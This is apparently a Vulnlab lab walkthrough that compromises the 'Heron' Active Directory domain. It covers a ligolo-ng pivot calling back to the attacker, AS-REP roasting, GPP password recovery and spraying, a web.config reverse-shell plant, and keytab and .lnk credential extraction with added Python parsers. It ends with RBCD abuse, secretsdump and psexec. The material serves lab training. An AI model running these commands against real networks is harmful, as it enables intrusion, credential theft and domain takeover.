VL-Heron

Initial Access

From the wiki, we obtain initial SSH credentials:

pentest:Heron123!

A port scan of the target reveals only SSH:

PORT   STATE SERVICE
22/tcp open ssh

Network Pivoting with Ligolo-NG

Only SSH is exposed, so the Linux host becomes our pivot into the internal network. On the attack machine, start the ligolo-ng proxy and give it a tun interface. Recent ligolo-ng versions create the interface themselves with interface_create; the manual ip tuntap / ip link commands are the older way of doing the same thing, in which case you would use --tun ligolo below instead of evil-cha:

sudo ip tuntap add user {USER} mode tun ligolo
sudo ip link set ligolo up
interface_create --name "evil-cha"

On the Linux target, run the agent and point it back at the proxy listener on the attack machine:

./agent -connect 10.8.5.195:11601 --ignore-cert

After the agent connects, select its session with the session command and start the tunnel:

tunnel_start --tun evil-cha

Add a /32 route so that only the Windows machine's address is sent through the tunnel (HERE is a placeholder for that address):

interface_add_route --name evil-cha --route HERE/32

Web Enumeration

Through the tunnel, port 80 is open on the Windows host. From the Linux machine we also recover several domain users:

svc-web-accounting-d@heron.vl  svc-web-accounting@heron.vl

Additional users found:

wayne.wood@heron.vl
julian.pratt@heron.vl
samuel.davies@heron.vl

User Enumeration and Authentication

We use kerbrute to verify which of the discovered users are valid domain accounts:

./kerbrute userenum -d heron.vl --dc 10.10.232.133 ~/Downloads/usernames.txt

Kerbrute also reports accounts that do not require Kerberos pre-authentication and dumps their AS-REP hashes, but it requests AES keys, so the hashes come back in the $krb5asrep$18$ format. Hashcat can crack etype 18 AS-REPs (mode 32100), but far more slowly than the RC4 etype 23 format (mode 18200). Impacket's GetNPUsers requests RC4 by default, so we use it to obtain the $krb5asrep$23$ form:

GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile ~/Downloads/usernames.txt -dc-ip "10.10.232.133" "heron.vl"/

Cracking the hash:

hashcat -m 18200 hash223.txt /usr/share/wordlists/rockyou.txt

Credentials obtained:

samuel.davies:<PASS>

SMB Enumeration

Enumerating SMB shares with the compromised user:

netexec smb 10.10.232.133 -u 'samuel.davies' -p '<PASS>' --shares

The gpp_password module searches SYSVOL for Group Policy Preferences XML files. The cpassword values in them are encrypted with an AES key that Microsoft published, so any password it finds is recovered in cleartext:

netexec smb 10.10.232.133 -u 'samuel.davies' -p '<PASS>' -M gpp_password

Testing the GPP password against every known user over SMB:

netexec smb 10.10.232.133 -u usernames.txt -p '<PASS>' --continue-on-success

New credentials discovered:

svc-web-accounting-d:<PASS>

Enumerating SMB shares with the new user:

netexec smb 10.10.232.133 -u 'svc-web-accounting-d' -p '<PASS>' --shares

This account has READ,WRITE on the accounting$ share, which holds the web root of the accounting site. Within it, we locate the site's web.config:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="dotnet" arguments=".\AccountingApp.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Web Application Exploitation

First, we add the accounting vhost to /etc/hosts and log in to http://accounting.heron.vl/ as svc-web-accounting-d. The application itself gives us nothing useful, but it reveals a potential new user: rhys.george@heron.vl.

Because we can write to the web root, we can replace web.config. The aspNetCore element tells the ASP.NET Core Module which process to start for the site; pointing processPath at powershell with an encoded command makes IIS launch our payload the next time the site is requested. The hosting model has to change to OutOfProcess, since in-process hosting runs the application inside the IIS worker and never starts processPath as a separate process. For the reverse shell, the PowerShell #3 Base64 payload from revshells works well. The modified web.config:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="powershell" arguments="-e (BASE64 PAYLOAD)" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Paste the base64 payload (from revshells, or a hoaxshell payload) into the arguments attribute, then replace the file on the share from the smbclient session:

del web.config
put web.config

This gives us a shell as svc-web-accounting. The Windows host cannot reach our attack machine directly, so the payload must call back to the jumpbox and not to us: have Ligolo open a listener on the agent (the Linux machine) and forward it to our side. Using Sliver rather than a bare netcat shell is a good idea, because it lets you run your own tooling against the domain controller later.

Ligolo setup (on the proxy, with the agent session selected):

listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444

The reverse shell therefore points at the Linux machine on port 1234, while our listener on the attack machine waits on port 4444:

nc -lvnp 4444

With everything in place, refresh the page so IIS restarts the application and runs the payload, and the shell lands.

Domain Enumeration with BloodHound

With valid domain credentials we collect BloodHound data over LDAP through the tunnel:

netexec ldap 10.10.232.133 -u 'svc-web-accounting-d' -p '<PASS>' --bloodhound --dns-server 10.10.232.133 -c ALL --dns-tcp

Credential Hunting as svc-web-accounting

On the Windows host we find a script, ssh.ps1, that automates an SSH login to the jumpbox with a hardcoded password:

$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "<PASS>"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"

The _local account has full sudo access on the Linux machine, so we now control the jumpbox as root.

Lateral Movement via Linux Machine

The Linux machine is domain-joined, so /etc/krb5.keytab holds the long-term Kerberos keys of its machine account, FRAJMP$. The RC4-HMAC (etype 23) key in a keytab is the account's NT hash, which can be used directly for pass-the-hash or to request tickets as the machine account; the AES keys are not practically crackable, but they are not needed. We use KeyTabExtract to pull the keys out:

sudo python3 keytabextract.py /etc/krb5.keytab
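As an added example (not the page's KeyTabExtract, whose output the author used), here is a minimal Python parser for the 0x0502 keytab format, showing where the NT hash comes from: the RC4-HMAC keyblock is the NT hash itself, so no cracking is involved. SAMPLE_KEYTAB is constructed inside the block from dummy key bytes; nothing in it is a real lab value.

```python
import struct

ETYPE_NAMES = {
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
    23: "arcfour-hmac (RC4): the key IS the NT hash",
}


def _counted(b: bytes) -> bytes:
    """keytab counted_octet_string: 16-bit big-endian length followed by the bytes."""
    return struct.pack(">H", len(b)) + b


def build_keytab(entries) -> bytes:
    """Serialise (principal, etype, key, kvno) tuples into a version 0x0502 keytab.
    Used here only to construct test data; real keytabs are written by the domain join."""
    out = bytearray(b"\x05\x02")
    for principal, etype, key, kvno in entries:
        name, realm = principal.split("@", 1)
        comps = name.split("/")
        body = struct.pack(">H", len(comps)) + _counted(realm.encode())
        for c in comps:
            body += _counted(c.encode())
        body += struct.pack(">IIB", 1, 0, kvno & 0xFF)    # name_type KRB5_NT_PRINCIPAL, timestamp, vno8
        body += struct.pack(">HH", etype, len(key)) + key  # keyblock: enctype, length, key
        body += struct.pack(">I", kvno)                    # optional 32-bit kvno trailer
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


def parse_keytab(data: bytes) -> list:
    """Parse a version 0x0502 (MIT/Heimdal) keytab into a list of entry dicts."""
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version %r" % data[:2])
    off, entries = 2, []

    def counted() -> bytes:
        nonlocal off
        (n,) = struct.unpack_from(">H", data, off)
        off += 2
        s = data[off:off + n]
        off += n
        return s

    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size == 0:
            break
        if size < 0:              # a negative size marks a deleted slot of that length
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm = counted().decode()
        comps = [counted().decode() for _ in range(ncomp)]
        _name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, off)
        off += 9
        etype, klen = struct.unpack_from(">HH", data, off)
        off += 4
        key = data[off:off + klen]
        off += klen
        kvno = struct.unpack_from(">I", data, off)[0] if end - off >= 4 else vno8
        entries.append({
            "principal": "/".join(comps) + "@" + realm,
            "etype": etype,
            "etype_name": ETYPE_NAMES.get(etype, "etype %d" % etype),
            "key": key.hex(),
            "kvno": kvno,
            "timestamp": timestamp,
        })
        off = end
    return entries


def nt_hashes(entries) -> dict:
    """Map principal -> NT hash for every RC4-HMAC entry: ready for -hashes :<HASH>."""
    return {e["principal"]: e["key"] for e in entries if e["etype"] == 23}


# Constructed sample: a machine account with AES and RC4 keys. The key bytes are dummies.
SAMPLE_KEYTAB = build_keytab([
    ("host/frajmp.heron.vl@HERON.VL", 18, bytes(range(32)), 3),
    ("host/frajmp.heron.vl@HERON.VL", 23, bytes.fromhex("00112233445566778899aabbccddeeff"), 3),
    ("FRAJMP$@HERON.VL", 23, bytes.fromhex("00112233445566778899aabbccddeeff"), 3),
])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_KEYTAB
    for e in parse_keytab(data):
        print(f"{e['principal']:35} kvno={e['kvno']} {e['etype_name']:45} {e['key']}")
    print("NT hashes:", nt_hashes(parse_keytab(data)))
```

Run it as root against /etc/krb5.keytab; the hash printed for the FRAJMP$ entry is the value used with -hashes in the RBCD steps below.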
Spraying the passwords recovered so far across the user list gives a hit on julian.pratt (note that the DC's address is 10.10.202.197 in this run):

netexec smb 10.10.202.197 -u usernames.txt -p '<PASS>' --continue-on-success

We gain access to his home directory via the home$ share:

smbclient //10.10.202.197/home$ -U julian.pratt

Inside it is a shortcut, mucjmp.lnk. After retrieving it and inspecting it locally (cat mucjmp.lnk is enough, since the terminal usually drops the interleaved NUL bytes of the UTF-16LE string; strings -el mucjmp.lnk is cleaner), we find a plink command line with autologin credentials for adm_prju:

adm_prju@mucjmp -pw <PASS>
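As an added example (not part of the original write-up), the following Python script parses the .lnk properly instead of relying on cat: it walks the Shell Link header, skips the IDList and LinkInfo blocks, and reads the StringData fields in their fixed on-disk order, then pulls user@host and the -pw value out of the arguments. It handles both the UTF-16LE and the ANSI string encodings, so it works on shortcuts that cat would show as garbage. SAMPLE_LNK is constructed in the block; the password in it is a placeholder, not a lab value.

```python
import struct

# Shell Link header constants (MS-SHLLINK)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_DATA = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
               ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
               ("icon_location", HAS_ICON_LOCATION))  # fixed on-disk order


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk, skipping the IDList and LinkInfo blocks before them."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:              # IDListSize (2 bytes) + IDList
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                        # LinkInfoSize counts itself
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, bit in STRING_DATA:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)  # CountCharacters, not bytes
        off += 2
        nbytes = count * 2 if unicode else count
        fields[name] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
        off += nbytes
    return fields


def plink_credentials(arguments: str):
    """Pull user@host and the -pw value out of a plink/putty style argument string, else None."""
    tokens = arguments.split()
    if "-pw" not in tokens or tokens.index("-pw") + 1 >= len(tokens):
        return None
    target = next((t for t in tokens if "@" in t), None)
    return target, tokens[tokens.index("-pw") + 1]


def _string_data(s: str, unicode: bool) -> bytes:
    return struct.pack("<H", len(s)) + s.encode("utf-16-le" if unicode else "cp1252")


def build_lnk(relative_path: str, working_dir: str, arguments: str, unicode: bool = True) -> bytes:
    """Assemble a minimal well-formed .lnk (constructed test data; Explorer-written files carry more blocks)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
    if unicode:
        flags |= IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    item = b"\x1f\x50"                                # opaque shell item; the parser only skips it
    idlist = struct.pack("<H", 2 + len(item)) + item + b"\x00\x00"
    body = struct.pack("<H", len(idlist)) + idlist
    for s in (relative_path, working_dir, arguments):
        body += _string_data(s, unicode)
    return header + body


# Constructed sample shortcut; the password is a placeholder, not a lab value.
SAMPLE_LNK = build_lnk(r"..\..\..\Program Files\PuTTY\plink.exe", r"C:\Program Files\PuTTY",
                       "-ssh adm_prju@mucjmp -pw Hypothetical_Pass1")

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    fields = parse_lnk(data)
    for k, v in fields.items():
        print(f"{k:14} {v}")
    print("credentials:", plink_credentials(fields.get("arguments", "")))
```

Point it at mucjmp.lnk (or loop it over every .lnk in a share) to get the arguments without guessing at NUL-padded output.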

Domain Admin Privilege Escalation

From the BloodHound data, adm_prju is a member of Admins_T1, which has WriteAccountRestrictions over the domain controller MUCDC$. That right lets us write msDS-AllowedToActOnBehalfOfOtherIdentity on the DC's computer object, i.e. configure resource-based constrained delegation. To use it we need an account with an SPN whose secret we hold, normally a machine account, and we already have the keys of the Linux machine account FRAJMP$ from the keytab.

First, as adm_prju, allow FRAJMP$ to delegate to MUCDC$:

impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -action 'write' 'heron.vl/adm_prju:<PASS>'

Then, authenticating as FRAJMP$ with its NT hash, perform S4U2Self and S4U2Proxy to obtain a CIFS service ticket for the DC as _admin (this would fail for a user marked "sensitive and cannot be delegated" or placed in Protected Users):

impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :<HASH>

getST writes the ticket to a .ccache file. Point KRB5CCNAME at it and dump the domain secrets with Kerberos authentication through the pivot. The output is slow because every packet traverses the tunnel, so be patient:

export KRB5CCNAME=<ticket>.ccache
impacket-secretsdump -k -no-pass 'heron.vl/_admin@mucdc.heron.vl'

WinRM turned out to be disabled, so we use psexec with the dumped hash instead:

impacket-psexec 'heron.vl/_admin@mucdc.heron.vl' -hashes :<HASH>

https://api.vulnlab.com/api/v1/share?id=395c9eb2-2c08-4675-9b0e-3bf0bb3c4c44